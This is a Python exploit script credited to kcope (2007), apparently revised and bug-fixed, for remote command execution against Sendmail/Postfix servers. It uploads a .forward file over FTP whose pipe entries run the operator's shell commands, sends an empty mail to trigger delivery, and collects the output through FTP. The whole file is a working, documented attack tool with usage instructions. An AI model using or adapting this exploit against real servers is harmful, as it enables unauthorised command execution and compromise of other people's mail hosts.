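#!/usr/bin/env python
# (C) 2007 kcope production
"""Sendmail/Postfix ``.forward`` remote command execution via FTP ("skyline").

Attack chain, exactly as implemented below:

1. Log in to the target's FTP service with the supplied credentials and
   ``STOR`` a ``.forward`` file into the login directory.  The first upload
   is a harmless probe (``|touch /tmp/XXX``) that only proves the upload
   works; the second carries the operator's commands, one pipe entry each,
   with their output redirected into ``~/RESULTS``.
2. Send an empty mail to ``<ftp-user>@<SMTP banner hostname>`` so the MTA
   delivers it through the uploaded ``.forward`` and runs the pipe entries.
3. Fetch ``RESULTS`` over FTP, print it and delete it on the server.

Preconditions the script relies on but does not verify:

* the FTP login directory is the home directory of the mail recipient, so
  the MTA actually consults the uploaded ``.forward``;
* the MTA honours pipe entries in ``.forward`` for that user (the original
  author's note: sendmail runs a single command, postfix runs many);
* the first token of the SMTP greeting is a domain the MTA delivers locally;
* the ``~/RESULTS`` redirection assumes the entry is run by a shell with
  ``HOME`` set for the recipient -- TODO confirm per MTA.

Operational caveats:

* The upload overwrites any existing ``.forward`` in the target directory,
  and nothing here removes it afterwards -- clean it up by hand.
* Command text is inserted into ``.forward`` verbatim inside double quotes;
  a command containing ``"`` will break its entry.
* Mail delivery is asynchronous: ``RESULTS`` is polled a few times before
  giving up.

Usage: ``skyline.py <host> <ftp-user> <ftp-password>``; commands are read
from stdin, one per line, terminated by a line containing only ``.``.
"""
from __future__ import print_function

import ftplib
import io
import smtplib
import socket
import sys
import time

#: seconds before an FTP/SMTP operation is abandoned instead of hanging
TIMEOUT = 30
#: harmless first upload that only proves ``STOR .forward`` works
PROBE_FORWARD = "|touch /tmp/XXX\n"
#: file in the target's home directory the piped commands write into
RESULTS_NAME = "RESULTS"
#: HELO/EHLO name presented to the MTA (kept from the original)
HELO_NAME = "eyecandy"
#: how often / how long to wait for the MTA to deliver the trigger mail
RETRIES = 5
RETRY_DELAY = 2
#: every network failure the CLI reports instead of letting it traceback
NETWORK_ERRORS = ftplib.all_errors + (socket.error, smtplib.SMTPException)


def _to_bytes(text):
    """Return *text* as bytes (a no-op for Python 2 byte strings)."""
    if isinstance(text, bytes):
        return text
    return text.encode("utf-8")


def _to_text(data):
    """Return *data* as a native ``str`` (decodes bytes on Python 3)."""
    if isinstance(data, str):
        return data
    return data.decode("ascii", "replace")


def read_commands(stream):
    """Read commands from *stream*, one per line, up to a line that is ``.``.

    Returns the stripped, non-empty lines in order.  Stops at EOF as well
    as at the ``.`` terminator: the original looped forever on a closed
    stdin, because ``readline()`` kept returning ``""`` which never
    compared equal to ``"."``.
    """
    commands = []
    while True:
        raw = stream.readline()
        if not raw:  # EOF: nothing more will ever arrive
            break
        line = raw.strip()
        if line == ".":
            break
        if line:  # an empty command would only produce a junk pipe entry
            commands.append(line)
    return commands


def build_forward(commands):
    """Render *commands* as ``.forward`` pipe entries.

    The first command truncates ``~/RESULTS`` (``>``), the rest append
    (``>>``), so one delivery collects every command's output in order.
    Each entry is ``|"<cmd>> ~/RESULTS"``; the command text is not escaped.
    Returns ``""`` for an empty command list.
    """
    entries = []
    for index, command in enumerate(commands):
        redirect = ">" if index == 0 else ">>"
        entries.append('|"%s%s ~/%s"\n' % (command, redirect, RESULTS_NAME))
    return "".join(entries)


def ftp_login(hostname, username, password):
    """Open an FTP session, print the banner and log in.

    Raises one of ``ftplib.all_errors``/``socket.error`` on failure.
    """
    ftp = ftplib.FTP(hostname, timeout=TIMEOUT)
    print(ftp.getwelcome())
    ftp.login(username, password)
    return ftp


def ftp_close(ftp):
    """Close *ftp* with QUIT, falling back to a hard close if QUIT fails."""
    try:
        ftp.quit()
    except NETWORK_ERRORS:
        ftp.close()


def upload_forward(hostname, username, password, content):
    """``STOR`` *content* as ``.forward`` in the FTP login directory.

    The content is streamed from memory on purpose: the original wrote a
    local ``./.forward`` first, which -- when run from the operator's own
    home directory -- silently installed the payload into the operator's
    own mail delivery.  Raises ``NETWORK_ERRORS`` on failure.
    """
    ftp = ftp_login(hostname, username, password)
    try:
        ftp.storbinary("STOR .forward", io.BytesIO(_to_bytes(content)))
    finally:
        ftp_close(ftp)


def banner_hostname(banner, fallback):
    """Extract the MTA's name from its 220 greeting text.

    *banner* is the greeting with the ``220`` code already stripped, e.g.
    ``"mail.example.com ESMTP Postfix"``; the first token is taken as the
    name (the original sliced the same token out of the raw line).
    Returns *fallback* when the greeting has no usable token.
    """
    tokens = _to_text(banner).split()
    return tokens[0] if tokens else fallback


def send_trigger(hostname, username):
    """Deliver an empty mail to ``username@<banner host>`` to fire ``.forward``.

    Returns the address used.  smtplib checks every reply code, so a
    rejected sender, recipient or DATA raises ``smtplib.SMTPException``
    instead of being ignored as in the raw-socket original.
    """
    smtp = smtplib.SMTP(local_hostname=HELO_NAME, timeout=TIMEOUT)
    code, banner = smtp.connect(hostname, 25)
    print("%d %s" % (code, _to_text(banner)))
    if code != 220:
        smtp.close()
        raise smtplib.SMTPConnectError(code, banner)
    address = "%s@%s" % (username, banner_hostname(banner, hostname))
    try:
        # The delivery itself is the trigger; the message body is irrelevant.
        smtp.sendmail(address, [address], "")
    finally:
        try:
            smtp.quit()
        except NETWORK_ERRORS:
            smtp.close()
    return address


def fetch_results(hostname, username, password, attempts=RETRIES,
                  delay=RETRY_DELAY):
    """Download and delete ``RESULTS`` from the FTP login directory.

    Returns the file's lines without line endings.  A permanent FTP error
    (typically ``550`` because the mail has not been delivered yet) is
    retried *attempts* times, *delay* seconds apart, before the last error
    is re-raised.  The original never downloaded the file at all: it
    printed it via ``retrlines`` and then tried to ``open()`` a local
    ``RESULTS`` that did not exist.
    """
    last_error = None
    for attempt in range(max(1, attempts)):
        if attempt:
            time.sleep(delay)
        ftp = ftp_login(hostname, username, password)
        try:
            lines = []
            ftp.retrlines("RETR %s" % RESULTS_NAME, lines.append)
            ftp.delete(RESULTS_NAME)
            return lines
        except ftplib.error_perm as exc:
            last_error = exc
            print("[ ] %s not available yet (%s), retrying" % (RESULTS_NAME, exc))
        finally:
            ftp_close(ftp)
    raise last_error


def main(argv):
    """CLI entry point; returns the process exit status (0 on success)."""
    print("Sendmail/Postfix FORWARD Remote Exploit")
    print("kcope/2007 - hey alex,andi")
    if len(argv) != 4:
        print("usage: %s <host> <ftp-user> <ftp-password>" % argv[0])
        return 2
    hostname, username, password = argv[1:4]

    print("[+] INITIAL FTP STOR")
    try:
        upload_forward(hostname, username, password, PROBE_FORWARD)
    except NETWORK_ERRORS as exc:
        print("[-] FTP Error. Correct Login Credentials ? (%s)" % exc)
        return 1

    print("[+] PLEASE ENTER COMMANDS TO EXECUTE")
    print("[+] sendmail allows a single command")
    print("[+] postfix allows many")
    print("[+] END WITH . IN A SINGLE LINE")
    commands = read_commands(sys.stdin)
    if not commands:
        print("[-] No commands given, nothing to do")
        return 2

    print("[+] FTP STOR")
    try:
        upload_forward(hostname, username, password, build_forward(commands))
    except NETWORK_ERRORS as exc:
        print("[-] FTP Error. Correct Login Credentials ? (%s)" % exc)
        return 1

    print("[+] EXPLOITING BOX")
    try:
        send_trigger(hostname, username)
    except NETWORK_ERRORS as exc:
        print("[-] EXPLOITATION Error. Is sendmail/postfix running ? (%s)" % exc)
        return 1

    print("[+] RETRIEVING RESULTS")
    try:
        lines = fetch_results(hostname, username, password)
    except NETWORK_ERRORS as exc:
        print("[-] FTP RETRIEVE Error. Correct Login Credentials ? "
              "Sendmail / postfix accepting messages ? (%s)" % exc)
        return 1
    for line in lines:
        print(line)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))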